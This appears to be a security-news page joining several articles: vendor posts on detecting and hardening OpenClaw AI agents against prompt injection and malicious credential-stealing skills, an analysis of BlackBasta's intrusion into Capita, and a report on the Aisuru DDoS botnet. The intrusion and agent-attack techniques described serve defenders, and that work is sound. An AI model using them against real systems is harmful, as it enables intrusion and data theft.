The rapid adoption of Large Language Models (LLMs) and Artificial Intelligence (AI) introduces transformative capabilities, but also novel and complex security challenges. Securing these sophisticated systems requires a multi-layered, end-to-end approach that extends beyond traditional cybersecurity measures. SentinelOne’s® Singularity™ Platform is uniquely positioned to provide holistic protection for LLM and AI environments, from the underlying infrastructure to the integrity of the models themselves and their interactions.

This document provides a detailed breakdown of how SentinelOne’s capabilities address the unique security requirements and emerging threats associated with LLMs and AI, now further enhanced by the integration of Prompt Security’s cutting-edge AI usage and agent security technology.

Because the most urgent question security leaders are asking right now is specifically about agentic AI assistants, tools like OpenClaw (aka Clawdbot and Moltbot) that can execute code and access data with user-level privileges, this document leads with dedicated coverage for those tools before mapping the full platform architecture.

Securing Agentic AI Assistants: OpenClaw Coverage

The Question Security Leaders Are Asking

“Do we have coverage for the new agentic AI assistants, such as OpenClaw (aka. Moltbot and Clawdbot) that are showing up across our environment?” Yes. SentinelOne provides multi-layered detection, hunting, and governance capabilities that specifically address these tools across three reinforcing control planes: EDR/XDR telemetry, AI interaction security (Prompt Security), and open-source agent hardening (ClawSec).

OpenClaw (aka Clawdbot and Moltbot) represent the next evolution of shadow AI risk. Unlike browser-based chatbots that operate within a web session, these agentic AI assistants can execute code, spawn shell processes, access local files and secrets, call external APIs, and operate with the same privileges as the user account running them. In SentinelOne’s SOC framework, they fall squarely into the highest-risk categories: agentic execution and compromise through the loop.

If an agentic assistant can read files, call tools, and talk out, it should be treated like a privileged automation account and secured accordingly.

Coverage Layer 1: EDR/XDR Detection & Threat Hunting

SentinelOne’s Singularity agent provides telemetry and tracking of OpenClaw (aka. Moltbot and Clawdbot). The Data Lake PowerQuery provided below adds detection of any activity at the endpoint level. Purpose-built hunting queries target these tools across four signal categories:

Signal Category What SentinelOne Detects Example Indicators
Process Execution Clawdbot, OpenClaw, or Moltbot runtime processes launching on endpoints Command-line strings containing clawdbot, moltbot, or openclaw
File Activity Creation, modification, or presence of agentic assistant files File paths containing openclaw or clawdbot binaries and configurations
Network Activity Communication on default agentic service ports and domains associated with ‘bad’ extensions Traffic on port 18789 (default OpenClaw listener)
Persistence Mechanisms Scheduled tasks or services establishing agent persistence Scheduled tasks named OpenClaw or related service registrations

Dedicated PowerQuery for Clawdbot / OpenClaw / Moltbot:

dataSource.name = 'SentinelOne' AND

(event.type = 'Process Creation' AND tgt.process.cmdline

contains:anycase ('clawdbot','moltbot','openclaw')) OR

(tgt.file.path contains 'openclaw' or

tgt.file.path contains 'clawdbot') OR

(src.port.number = 18789 or dst.port.number = 18789) OR

(task.name contains 'OpenClaw')

| columns event.time, src.process.storyline.id, event.type,

endpoint.name, src.process.user, tgt.process.cmdline,

tgt.process.publisher, tgt.file.path,

src.process.parent.name, src.process.parent.publisher,

src.process.cmdline, src.ip.address, dst.ip.address

Beyond this targeted query, SentinelOne’s tiered SOC hunting framework provides behavioral detection that catches agentic assistants even when they are renamed, updated, or running through wrapper processes:

  • Tier 1 (Discovery): Identifies AI-capable runtimes and destinations across the environment, surfacing where agents like OpenClaw are executing.
  • Tier 3 (Behavioral): Detects the “agent-shaped” pattern, interpreter runtimes (Python, Node) spawning shell processes, touching secrets, and calling external APIs, which is the operational fingerprint of OpenClaw (aka Clawdbot and Moltbot) regardless of binary name.
  • Tier 4 (Impact): Correlates secrets access with non-standard egress within the same Storyline, identifying when an agentic assistant has moved from exploration to data exfiltration.

Storyline connects the entire chain of custody (i.e. what launched the agent, what it touched, and where it communicated) providing a defensible incident narrative for any agentic AI activity.

Coverage Layer 2: AI Interaction Security (Prompt Security)

The Prompt Security capabilities described in Pillar 7 of this document apply directly to OpenClaw (aka Clawdbot and Moltbot), but agentic assistants create risks that go beyond what standard AI chatbot monitoring addresses:

  • Agentic Shadow AI Discovery: Unlike browser-based AI tools that appear in web traffic logs, agentic assistants often run as local processes or connect through non-standard ports. Prompt Security identifies these tools regardless of how they connect, closing the visibility gap that network-based monitoring misses.
  • Execution-Aware Content Controls: Because agentic assistants can act on the instructions they receive (i.e. executing code, modifying files, calling APIs), Prompt Security’s content inspection takes on heightened importance. Sensitive data filtered at the interaction layer is prevented from ever entering an execution pipeline.
  • MCP Tool-Chain Governance: OpenClaw (aka Clawdbot and Moltbot) frequently interact with MCP tool servers to extend their capabilities. Prompt for agentic AI intercepts these calls, applying dynamic risk scoring before the agent can act on tool responses.

Coverage Layer 3: Agent Hardening (ClawSec)

ClawSec, an open-source security skill suite built by Prompt Security from SentinelOne, provides defense-in-depth specifically designed for OpenClaw agents:

  • Skill Integrity & Supply Chain Verification: Eliminates blind trust in downloaded skills by distributing security skills with checksums and verified sources. Drift detection flags when critical files have been silently modified.
  • Posture Hardening & Automated Audits: Scans for prompt-injection vectors, unsafe configurations, and runtime vulnerabilities within the agent environment. Automated daily audits generate human-readable security reports.
  • Community-Driven Threat Intelligence: Connects to a live security advisory feed powered by public vulnerability data (NVD) and community reports, making verified threat intelligence immediately available to subscribed agents.
  • Zero-Trust by Default: Blocks unauthorized egress and telemetry. If a threat is detected, the agent must explicitly request user consent before reporting externally, thereby eliminating hidden communication and background data sharing.

Integrated Coverage: How the Three Layers Work Together

Control Plane Coverage Scope Key Capability
EDR/XDR (Singularity Agent + Data Lake) Endpoint-level process, file, network, and persistence detection Behavioral detection via Storyline; purpose-built PowerQuery for Clawdbot/OpenClaw/Moltbot
AI Interaction Security (Prompt Security) User-to-AI interaction layer Real-time data leakage prevention, prompt injection blocking, shadow AI discovery
Agent Hardening (ClawSec) Within the OpenClaw agent runtime Skill integrity verification, posture hardening, zero-trust egress control

This three-layer approach ensures that whether an agentic AI assistant is discovered through EDR telemetry, flagged by Prompt Security’s interaction monitoring, or hardened proactively by ClawSec, security teams have full visibility and control over the risk these tools introduce.

At a Glance: Seven Security Pillars Mapped to Business Risk

The agentic AI coverage detailed above draws on all seven of SentinelOne’s core security pillars working together. The following table maps each pillar to the AI-specific threats it addresses and the business outcomes it protects, giving security leaders a rapid-reference guide for aligning platform capabilities to their organization’s AI risk priorities.

Security Pillar AI Risk Addressed Business Outcome Protected
Cloud Native Security (CNS) Exposed training data, misconfigured infrastructure, exploitable cloud paths Prevents data breaches; reduces regulatory exposure
Workload Protection Runtime compromise, container escapes, fileless attacks on AI hosts Ensures AI service continuity; prevents operational disruption
AI SIEM Multi-stage attacks, low-and-slow exfiltration, anomalous LLM usage Enables detection of sophisticated threats; supports forensics and compliance
Purple AI Evolving LLM attack techniques, slow investigation response times Reduces MTTR; accelerates threat hunting without specialist expertise
Automation & Response Fast-moving exfiltration, API key compromise, unauthorized data egress Minimizes breach blast radius; contains incidents autonomously
Secret Scanning & IaC Hardcoded credentials, pipeline vulnerabilities, insecure infrastructure definitions Prevents supply chain compromise; secures pre-production environments
AI Usage & Agent Security (Prompt Security) Shadow AI, prompt injection, data leakage through AI interactions, jailbreaks Protects IP and sensitive data; enables safe AI adoption at scale

Recommended Next Steps for Security Leaders

This week: You can’t govern what you can’t see. Run the OpenClaw detection query in your Data Lake to determine whether agentic AI assistants are already active in your environment, assuming they are until proven otherwise. Audit browser extensions across high-risk teams. Review your AI acceptable use policy to confirm it addresses autonomous agents, not just chatbots. The goal is a baseline inventory of what AI tools exist, where they’re running, and who’s using them.

Within 90 days: Move from inventory to continuous visibility. A Prompt Security proof of value can get you there quickly, delivering real-time discovery of all AI tool usage across your environment, including the shadow AI activity your current stack can’t see. Use that visibility to establish sanctioned alternatives that give employees a secure path to the productivity they’re already chasing with unsanctioned tools. Operationalize behavioral detection hunts as automated detection rules so your SOC can identify new agentic activity as it appears, not months later.

Within 6 months: Mature from visibility into governance. Complete a full AI tool inventory with data classification and risk scoring. Establish enforcement policies that contain or block unsanctioned agentic tools at the endpoint, interaction, and network layers. Build board-ready reporting metrics that track AI-related risk posture over time. The organizations that move fastest here won’t be starting from scratch, they’ll be the ones that invested in visibility early enough to know what they’re governing.

Conclusion: From Visibility to Confidence

Securing LLMs and AI is not a future challenge, it’s a present imperative. SentinelOne’s Singularity Platform, now significantly enhanced by the capabilities of Prompt Security, provides end-to-end protection that spans cloud infrastructure, workload runtime, AI interaction governance, and automated response.

But the threat landscape is no longer just about chatbots and data leakage. The rapid adoption of agentic AI assistants like OpenClaw demonstrates that AI tools are evolving from passive information retrieval into autonomous agents that execute code, access secrets, and operate with real privileges on real systems. This shift demands a corresponding shift in security posture — from monitoring what employees type into a browser to governing what autonomous processes do on your endpoints.

SentinelOne’s three-layer coverage model addresses this directly. EDR/XDR telemetry provides behavioral detection at the endpoint. Prompt Security governs the interaction layer where sensitive data meets AI. And ClawSec hardens the agent runtime itself. Together, these layers give security teams the ability to discover, govern, and contain agentic AI tools without blocking the productivity gains they deliver.

The gap between organizations that believe they have AI governance and those that actually do is exactly where breaches happen. Organizations that close that gap won’t be those that adopted AI fastest or blocked it longest, they’ll be the ones that built the visibility, controls, and response capabilities to adopt it safely.

Security isn’t the department that says no to AI. It’s the function that makes AI possible at enterprise scale. To learn more about securing your OpenClaw agents, register for our upcoming webinar happening Tuesday, March 3, 2026.

Join the Webinar
SentinelOne AI & Intelligence Leaders Discuss How to Secure OpenClaw Agents on March 3, 2026 at 10:00AM PST / 1:00PM EST

ClawSec: Hardening OpenClaw Agents from the Inside Out

Autonomous agents are moving fast – from experimental side projects to real operational components inside development workflows and cloud environments. While agent capabilities are accelerating though, agent security itself has lagged behind. Most agent frameworks still assume implicit trust: There is trust in downloaded skills, prompts that evolve over time, and trust in agents not to quietly exfiltrate data or drift into unsafe behavior.

That assumption has already been proven wrong. Over the last week, researchers have already uncovered more than 200 malicious OpenClaw skills published in a few short days, all masquerading as legitimate utilities while delivering credential-sharing malware. Distributed through GitHub and OpenClaw’s official registry, these skills harvested API keys, cloud secrets, wallet data, and SSH credentials, highlighting how easily agent supply chains can be weaponized at scale.

This activity did not emerge in isolation. OpenClaw’s rapid growth, decentralized skill ecosystem, and deep system-level access have created a large, largely unmanaged attack surface. Skills are often installed directly from public repositories, documentation is trusted at face value, and agents are granted persistent memory and tool access that rivals traditional applications without equivalent security controls.

Since the assumption of implicit trust no longer holds in today’s landscape, ClawSec was designed to close that gap. ClawSec is an open-source security skill suite created to harden OpenClaw agents against prompt injection, supply chain compromise, configuration drift, and unsafe runtime behavior. Purpose-built as a “skill-of-skills”, ClawSec wraps agents in a continuously verified security layer, validating what it runs, how it changes, and where the data is allowed to go. Now live on GitHub, ClawSec is a zero-cost, privacy-first solution protecting both humans and autonomous agents via a single install.

Why We Are Rethinking Agent Security

Traditional application security models don’t map cleanly onto agentic systems. As agents are dynamic by nature, they pull skills from external sources, modify their own prompts, call tools autonomously, and adapt their behavior over time. That flexibility is powerful, but it also creates new attack surfaces. Some of the most common failure modes include:

  • Blind trust in skills downloaded from public repositories
  • Prompt injection attacks that manipulate agent behavior at runtime
  • Silent configuration drift that weakens guardrails over time
  • Unauthorized egress where agents send data externally without user awareness

In many cases, these issues go undetected because there is no continuous verification layer watching the agent’s internals. ClawSec is designed to be that layer.

Introducing ClawSec

ClawSec is the first open-source security suite, purpose-built for OpenClaw deployments. Rather than acting as a single defense mechanism, it functions as a composable security platform made up of modular skills that work in tandem with each other.

Operating as a “skill-of-skills”, ClawSec is a hardened shell around an agent. It doesn’t replace existing skills – it validates and protects them. Every security-relevant aspect of the agent is continuously checked, from supply chain integrity to runtime behavior and outbound communications.

ClawSec is a project by Prompt Security, a SentinelOne company, with its purpose rooted in security research, experimentation, and agentic workflow hardening. The goal here is not control, but resilience. By making agent security open, auditable, and driven by the community, ClawSec aims to set the highest bar possible for what “safe by default” means in today’s class of autonomous systems.

How It Works

ClawSec is a closed feedback loop where individual detections strengthen the entire ecosystem over time.

  1. Install – Load the ClawSec suite as a single security skill.
  2. Activate – Integrity checks, posture hardening, and audits begin immediately.
  3. Detect – Suspicious behavior, drift, or known threats are flagged.
  4. Decide – The agent requests permission before reporting or communicating.
  5. Protect – Verified reports become community advisories that protect other agents.

Secure Skill Integrity & Supply Chain Defense

One of the most critical risks in agent-based ecosystems is skill supply chain compromise. Agents routinely download and execute skills written by third parties, often without any cryptographic verification or checks. With ClawSec, teams eliminate blind trust.

In ClawSec, every security skill is distributed with check-sums and verified sources only. The suite supposes standard SKILL.md definitions as well as packaged .skill formats, guaranteeing compatibility with all existing OpenClaw workflows.

Once installed, it continuously monitors critical files such as TOOLS.md, prompt baselines, and configuration manifests for signs of drift. In the case of unexpected changes, the agent is alerted immediately. This approach treats skills the way modern security teams need to treat dependencies: verify first, trust second. ClawSec ensures that silent modifications are no longer invisible.

Proactive Posture Hardening & Automated Results

Security should not be reactive. ClawSec activates posture hardening as soon as it is installed, meaning agents’ configuration and runtime context for known prompt-injection vectors, unsafe defaults, and misconfigurations are scanned and identified instantly.

For teams that want to run automated audits on a recurring basis, optional watchdog skills can be turned on for daily, on-startup, or post-major changes frequency. These audits generate human-readable responses that explain exactly what is being checked, what has changed, and what needs attention.

Community-Driven Threat Intelligence Without Centralization

Agent security evolves quickly, and no single team can track every emerging threat. ClawSec empowers teams by integrating a live, community-driven security advisory feed powered by the National Vulnerability Database (NVD) and reports submitted via GitHub Issues. When a threat is reviewed and verified by maintainers, it becomes an advisory that any subscribed ClawSec agent can consume.

With no centralized server, updates flow through GitHub workflows, making the system transparent, auditable, and resilient. As soon as a verified advisory is published, agents can then react automatically, flagging risky skills, alerting users, and putting a block on execution paths tied to known issues.

Zero-Trust by Default

As a deliberate design choice, ClawSec has a zero-trust stance on communication, enforcing silence as the baseline. Unauthorized egress and telemetry blocked outright, so the agent does not phone home when an anomaly, threat, or compromise is detected. Instead, it pauses and asks for explicit user consent before any reporting or external communications.

This model, with no hidden chatter, no background data sharing, and no surprise outbound requests, ensures that agents remain accountable to their operators – not to unseen infrastructure. Security events are handled transparently, with human experts at the core of the decision loop.

Conclusion | Build Secure. Share Secure.

While ClawSec is shipped with a strong set of core security capabilities, its real power lies in its extensibility. Developers are encouraged to contribute new security skills, including prompt defences, modules to help enforce policies, auditing tools, and more. All submitted skills are reviewed, check-summed, and published to a shared catalog meaning everyone can benefit.

What this creates is a shared security baseline for autonomous agents, defined and maintained by a community of experts rather than staying locked behind a vendor wall. We are excited to launch ClawSec to help organizations both build and share securely as we improve the security standard together.

Secure your OpenClaw Agents with ClawSec
Drift detection, security recommendations, automated audits, and skill integrity verification.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

Statistics Report on Malware Targeting Linux SSH Servers in Q4 2025

AhnLab SEcurity intelligence Center (ASEC) utilizes a honeypot to respond to and classify brute-force and dictionary attacks targeting poorly managed Linux SSH servers. This post covers the status of the attack sources identified in the logs from the fourth quarter of 2025 and the statistics of attacks launched by these sources. It also classifies the […]

Lessons from the BlackBasta Ransomware Attack on Capita

Introduction

When a company that manages data for millions of UK citizens falls victim to ransomware, the whole industry should pay attention to it. On 15 October 2025, the UK Information Commissioner’s Office (ICO) published a detailed 136 page report about the Capita breach. 

The aim of this blog is to extract actionable cybersecurity lessons from the ICO’s findings as well as open source reports surrounding the breach from a cyber threat intelligence (CTI) analyst’s perspective to help SOC and CERT teams, and CISOs understand what happened and how to avoid the mistakes made by others.

BLUF Incident Impact Summary:

  • Capita was attacked by BlackBasta ransomware in March 2023
  • Over six million individual’s records were exfiltrated from Capita’s systems
  • A £14 million fine was issued to Capita by the ICO
  • Capita said in May 2023, the incident cost up to £20 million to recover

Important context about Capita

The Capita Group is a business process outsourcing (BPO) and professional services group employing approximately 34,500 people worldwide and with a reported annual revenue of £2,421.6 million. For readers outside of Great Britain, Capita is best known as the UK’s go-to managed service provider for large-scale, data-sensitive public sector operations.

Companies within the Capita Group act as data processors for a range of business services to both public and private sector organisations. Capita plc is the ultimate parent company of a large corporate group consisting of multiple legal entities.

Capita has long been one of the UK government’s biggest suppliers of outsourced services.

They manage (or have managed):

  • The BBC TV Licensing system
  • The UK Congestion Charge for Transport for London (TfL) 
  • The National Pupil Database – via contracts with the Department for Education.
  • Electronic tagging of offenders – under contracts with the Ministry of Justice.
  • Council administration and call-centre services – many local authorities (e.g., Birmingham, Southampton, Sheffield) 
  • Numerous Local Government and private sector pension schemes (including universities, utilities, and insurance companies).
  • Ministry of Defence (MOD) – Training and support contracts for the British Army’s Recruitment Partnership Project (including vetting systems) and Royal Navy training programmes.

The ICO established that during the Incident, data was exfiltrated from two legal entities which were acting as data controllers, and from four legal entities which were acting as data processors:

  • Capita plc - Capita plc’s focus includes Central Government, Local Public Service, Defence, Education, and Pensions. Capita was selected to administer the UK’s Civil Service Pension Scheme (CSPS) from September 2025, via a contract worth £239m over 10 years.
  • Capita Resourcing Limited - is a subsidiary of Capita plc focused on resourcing/human-capital services, i.e., recruitment, contingent staffing, talent acquisition.
  • Capita Business Services Limited - is another subsidiary that provides business-process and digital services (as a part of the Capita outsourcing ecosystem). The supplier record shows over £331.9m recorded government spending linked to this entity.
  • Capita Pension Solutions Ltd (CPSL) - a regulated pensions business within the Capita Group. Its role: delivering pensions administration and consulting services for pension schemes, including defined benefit schemes.

Breach Timeline

In the ICO’s report, a timeline of events that led to data exfiltration and ransomware deployment was provided. The timeline diagram below helps illustrate what happened.


TheRecord also reported that Capita’s share price dropped more than 12% from a high of £38.64 ($47.97) on March 30, the day before the incident was first reported, to £33.72 ($42.58) on Wednesday morning.

On 3 April 2023, Capita released a public statement about the cyber incident. At the time, Capita said the “issue was limited to parts of the Capita network and there is no evidence of customer, supplier or colleague data having been compromised.” 

On 8 April 2023, Brett Callow spotted that Capita had been listed on BlackBasta’s Tor data leak site before it was quickly removed that same day.


Security researcher Kevin Beaumont who analysed the leaked data samples at the time identified copies of stolen passport scans, PII records, bank account details, internal floor plans of multiple buildings from various schools as well as Capita Nuclear, part of Capita Business Services.

It took Capita until 20 April 2023 to confirm that some of its systems were in fact breached and that data had been stolen.

Types of Stolen Data

In the ICO’s report, we learn that 6,024,221 data subjects for whom Capita was the data processor had personal data exfiltrated, as determined by Capita’s forensic provider.

Types of data stolen included sensitive such as Home Address, Email, Phone Number, National Insurance Numbers, Driver’s License Scans, Passport Scans, Bank Account Numbers & Sort Codes, Credit Card Numbers, Biometrics, Criminal Record Checks, and Employee Login details.

BlackBasta Operator TTPs

The tactics, techniques, and procedures (TTPs) of the BlackBasta operators provided in the breach timeline by the ICO are useful for understanding what technical steps were involved that led to the breach and ransomware attack. A summary of the aspects of the attack have been mapped to a diamond model diagram below.

Outside of the breach timeline, some additional technical details were shared:

  • Following initial access, the Threat Actor accessed the ‘CAPITA\backupadmin’ service account approximately 4.5 hours later. Capita could not confirm how the Threat Actor was able to escalate their privileges; however, there were traces of Kerberos credential harvesting and reconnaissance activity found following the Incident.
  • The Threat Actor was able to use the ‘CAPITA\backupadmin’ domain administrator account to pivot to administrator accounts in different Capita domains. In total no fewer than 8 domains were compromised, a very large quantity of data was exfiltrated and the Threat Actor attempted to deploy ransomware on at least 1057 hosts.
  • Even though Capita quarantined the device through which the Threat Actor first gained access on 24 March 2023, by this time the Threat Actor had deployed software into the network which had enabled them to establish persistence and ultimately allowed them to continue moving laterally across the network into different Capita domains and to access/exfiltrate data, before deploying ransomware on 31 March 2023.
Interestingly, in February 2025 internal chat logs from the BlackBasta gang were leaked publicly online. Analysis of the leaked chat logs for references of Capita revealed the below command shared by one of the BlackBasta members months after the attack happened:

The domain "corpcitrix.ad.capita.co.uk" appears to be an internal Active Directory domain name used by Capita to host its corporate Citrix environment. The "ad" label shows it’s an AD DNS namespace, "corpcitrix" indicates the environment is for Citrix-published desktops/apps or related infrastructure, and "capita.co.uk" is the organisation’s FQDN.

The command shown above is a PowerShell invocation (potentially via Cobalt Strike) to enumerate every system in the domain, resolve each machine’s IP address, and save the results to “SFS_pc.txt” file. Powerpick runs the code in an unmanaged PowerShell environment and can execute without being dependent on powershell.exe.

In short, this command shows a BlackBasta operator running net reconnaissance mapping hosts and IPs (likely to plan lateral movement, targeting, exfiltration or ransomware deployment).

Notable moments during the Incident

  • Critical alerts were mishandled or deprioritised: The initial malicious file (‘jdmb.js’) triggered a P2 (High) alert at 08:00 on 22 March 2023, indicating compromise. The SOC did not act for nearly 58 hours, despite automatic escalation warnings for missed service-level agreements (SLAs). The ICO also noted that “at no point in the six months before or after the Incident did Capita meet their SLA for any alert level.”
  • Excessive delay between detection and containment, plus a lack of automation: Isolation of the device from the rest of the Capita network still required human intervention, which took 58 hours to arrive. Capita’s SOC lacked the ability to isolate the device automatically. By then, the attacker had already gained domain admin access and moved laterally.
  • Inadequate incident response procedures: Capita did not invoke its Major Incident Management process until 09:22 on 29 March 2023, which was seven days after compromise. By that point, data exfiltration was already underway and it was two days before ransomware was deployed on 31 March 2023.
  • Understaffed and overburdened SOC team: Capita is understood to have had 1 SOC analyst per shift in place at the time of the Incident in March 2023. This combined with historic underperformance indicates systemic issues within the SOC, including inadequate staffing, insufficient training, and/or inefficient processes.

Lessons Learned from the BlackBasta Ransomware Attack on Capita

  • Having tools isn’t enough, they must be configured, integrated, and monitored effectively
    • Capita had Trellix EDR, a SIEM, and a SOC, but alerts were missed and containment delayed.
      • Lessons: Security tools are only as effective as the people, processes, and automation supporting them. Critical security alerts must have clear, measurable response times with automatic escalation if breached. Security Leadership must define and enforce strong Service Level Agreements (SLAs) for incident response.
  • Implement proper Active Directory (AD) tiering
    • Lack of AD tiering allowed attackers to move laterally from low-privilege systems to domain controllers (specifically a backup service account with domain admin privileges).
      • Lessons: Segregate admin privileges between tiers (workstations, servers, domain controllers) to contain breaches. Limit, rotate, and monitor privileged accounts using a PAM solution to enforce least privilege. Regularly review service accounts, ensure unique credentials, and monitor their activity for anomalies.
  • Act on penetration test findings promptly
    • Multiple pentests also warned of AD and privilege issues months before the breach, but fixes were delayed.
      • Lesson: Treat pentest reports as actionable tasks with deadlines and executive oversight.
  • Automate incident response where possible (SOAR)
    • Lack of Security Orchestration, Automation and Response (SOAR) led to manual triage delays.
      • Lesson: Use SOAR playbooks to automate containment, escalation, and alert enrichment for faster response.

Additional Resources

  1. Qakbot - https://attack.mitre.org/software/S0650/
  2. Cobalt Strike - https://attack.mitre.org/software/S0154/ 
  3. Bloodhound - https://attack.mitre.org/software/S0521/ 
  4. Rclone - https://attack.mitre.org/software/S1040/ 
  5. SystemBC - https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc   
  6. BlackBasta Ransomware - https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta 
  7. Credentials from Web Browsers (specifically performed by Qakbot) - https://attack.mitre.org/techniques/T1555/003/
  8. Steal or Forge Kerberos Tickets - https://attack.mitre.org/techniques/T1558/ 
  9. Exfiltration Over C2 Channel (performed by SystemBC and Rclone) - https://attack.mitre.org/techniques/T1041/
  10. BlackBasta Leaks: Lessons from the Ascension Health attack - https://blog.bushidotoken.net/2025/02/blackbasta-leaks-lessons-from-ascension.html 
  11. The Continuity of Conti - https://blog.bushidotoken.net/2022/11/the-continuity-of-conti.html 
  12. BlackBasta Group Profile (Ransomware Tool Matrix) - https://github.com/BushidoUK/Ransomware-Tool-Matrix/blob/main/GroupProfiles/BlackBasta.md 
  13. BlackBasta Group Profile (Ransomware Vuln Matrix) - https://github.com/BushidoUK/Ransomware-Vulnerability-Matrix/blob/main/GroupProfiles/BlackBasta.md

DDoS Botnet Aisuru Blankets US ISPs in Record DDoS

The world’s largest and most disruptive botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, new evidence suggests. Experts say the heavy concentration of infected devices at U.S. providers is complicating efforts to limit collateral damage from the botnet’s attacks, which shattered previous records this week with a brief traffic flood that clocked in at nearly 30 trillion bits of data per second.

Since its debut more than a year ago, the Aisuru botnet has steadily outcompeted virtually all other IoT-based botnets in the wild, with recent attacks siphoning Internet bandwidth from an estimated 300,000 compromised hosts worldwide.

The hacked systems that get subsumed into the botnet are mostly consumer-grade routers, security cameras, digital video recorders and other devices operating with insecure and outdated firmware, and/or factory-default settings. Aisuru’s owners are continuously scanning the Internet for these vulnerable devices and enslaving them for use in distributed denial-of-service (DDoS) attacks that can overwhelm targeted servers with crippling amounts of junk traffic.

As Aisuru’s size has mushroomed, so has its punch. In May 2025, KrebsOnSecurity was hit with a near-record 6.35 terabits per second (Tbps) attack from Aisuru, which was then the largest assault that Google’s DDoS protection service Project Shield had ever mitigated. Days later, Aisuru shattered that record with a data blast in excess of 11 Tbps.

By late September, Aisuru was publicly flexing DDoS capabilities topping 22 Tbps. Then on October 6, its operators heaved a whopping 29.6 terabits of junk data packets each second at a targeted host. Hardly anyone noticed because it appears to have been a brief test or demonstration of Aisuru’s capabilities: The traffic flood lasted less only a few seconds and was pointed at an Internet server that was specifically designed to measure large-scale DDoS attacks.

A measurement of an Oct. 6 DDoS believed to have been launched through multiple botnets operated by the owners of the Aisuru botnet. Image: DDoS Analyzer Community on Telegram.

Aisuru’s overlords aren’t just showing off. Their botnet is being blamed for a series of increasingly massive and disruptive attacks. Although recent assaults from Aisuru have targeted mostly ISPs that serve online gaming communities like Minecraft, those digital sieges often result in widespread collateral Internet disruption.

For the past several weeks, ISPs hosting some of the Internet’s top gaming destinations have been hit with a relentless volley of gargantuan attacks that experts say are well beyond the DDoS mitigation capabilities of most organizations connected to the Internet today.

Steven Ferguson is principal security engineer at Global Secure Layer (GSL), an ISP in Brisbane, Australia. GSL hosts TCPShield, which offers free or low-cost DDoS protection to more than 50,000 Minecraft servers worldwide. Ferguson told KrebsOnSecurity that on October 8, TCPShield was walloped with a blitz from Aisuru that flooded its network with more than 15 terabits of junk data per second.

Ferguson said that after the attack subsided, TCPShield was told by its upstream provider OVH that they were no longer welcome as a customer.

“This was causing serious congestion on their Miami external ports for several weeks, shown publicly via their weather map,” he said, explaining that TCPShield is now solely protected by GSL.

Traces from the recent spate of crippling Aisuru attacks on gaming servers can be still seen at the website blockgametracker.gg, which indexes the uptime and downtime of the top Minecraft hosts. In the following example from a series of data deluges on the evening of September 28, we can see an Aisuru botnet campaign briefly knocked TCPShield offline.

An Aisuru botnet attack on TCPShield (AS64199) on Sept. 28  can be seen in the giant downward spike in the middle of this uptime graphic. Image: grafana.blockgametracker.gg.

Paging through the same uptime graphs for other network operators listed shows almost all of them suffered brief but repeated outages around the same time. Here is the same uptime tracking for Minecraft servers on the network provider Cosmic (AS30456), and it shows multiple large dips that correspond to game server outages caused by Aisuru.

Multiple DDoS attacks from Aisuru can be seen against the Minecraft host Cosmic on Sept. 28. The sharp downward spikes correspond to brief but enormous attacks from Aisuru. Image: grafana.blockgametracker.gg.

BOTNETS R US

Ferguson said he’s been tracking Aisuru for about three months, and recently he noticed the botnet’s composition shifted heavily toward infected systems at ISPs in the United States. Ferguson shared logs from an attack on October 8 that indexed traffic by the total volume sent through each network provider, and the logs showed that 11 of the top 20 traffic sources were U.S. based ISPs.

AT&T customers were by far the biggest U.S. contributors to that attack, followed by botted systems on Charter Communications, Comcast, T-Mobile and Verizon, Ferguson found. He said the volume of data packets per second coming from infected IoT hosts on these ISPs is often so high that it has started to affect the quality of service that ISPs are able to provide to adjacent (non-botted) customers.

“The impact extends beyond victim networks,” Ferguson said. “For instance we have seen 500 gigabits of traffic via Comcast’s network alone. This amount of egress leaving their network, especially being so US-East concentrated, will result in congestion towards other services or content trying to be reached while an attack is ongoing.”

Roland Dobbins is principal engineer at Netscout. Dobbins said Ferguson is spot on, noting that while most ISPs have effective mitigations in place to handle large incoming DDoS attacks, many are far less prepared to manage the inevitable service degradation caused by large numbers of their customers suddenly using some or all available bandwidth to attack others.

“The outbound and cross-bound DDoS attacks can be just as disruptive as the inbound stuff,” Dobbin said. “We’re now in a situation where ISPs are routinely seeing terabit-per-second plus outbound attacks from their networks that can cause operational problems.”

“The crying need for effective and universal outbound DDoS attack suppression is something that is really being highlighted by these recent attacks,” Dobbins continued. “A lot of network operators are learning that lesson now, and there’s going to be a period ahead where there’s some scrambling and potential disruption going on.”

KrebsOnSecurity sought comment from the ISPs named in Ferguson’s report. Charter Communications pointed to a recent blog post on protecting its network, stating that Charter actively monitors for both inbound and outbound attacks, and that it takes proactive action wherever possible.

“In addition to our own extensive network security, we also aim to reduce the risk of customer connected devices contributing to attacks through our Advanced WiFi solution that includes Security Shield, and we make Security Suite available to our Internet customers,” Charter wrote in an emailed response to questions. “With the ever-growing number of devices connecting to networks, we encourage customers to purchase trusted devices with secure development and manufacturing practices, use anti-virus and security tools on their connected devices, and regularly download security patches.”

A spokesperson for Comcast responded, “Currently our network is not experiencing impacts and we are able to handle the traffic.”

9 YEARS OF MIRAI

Aisuru is built on the bones of malicious code that was leaked in 2016 by the original creators of the Mirai IoT botnet. Like Aisuru, Mirai quickly outcompeted all other DDoS botnets in its heyday, and obliterated previous DDoS attack records with a 620 gigabit-per-second siege that sidelined this website for nearly four days in 2016.

The Mirai botmasters likewise used their crime machine to attack mostly Minecraft servers, but with the goal of forcing Minecraft server owners to purchase a DDoS protection service that they controlled. In addition, they rented out slices of the Mirai botnet to paying customers, some of whom used it to mask the sources of other types of cybercrime, such as click fraud.

A depiction of the outages caused by the Mirai botnet attacks against the internet infrastructure firm Dyn on October 21, 2016. Source: Downdetector.com.

Dobbins said Aisuru’s owners also appear to be renting out their botnet as a distributed proxy network that cybercriminal customers anywhere in the world can use to anonymize their malicious traffic and make it appear to be coming from regular residential users in the U.S.

“The people who operate this botnet are also selling (it as) residential proxies,” he said. “And that’s being used to reflect application layer attacks through the proxies on the bots as well.”

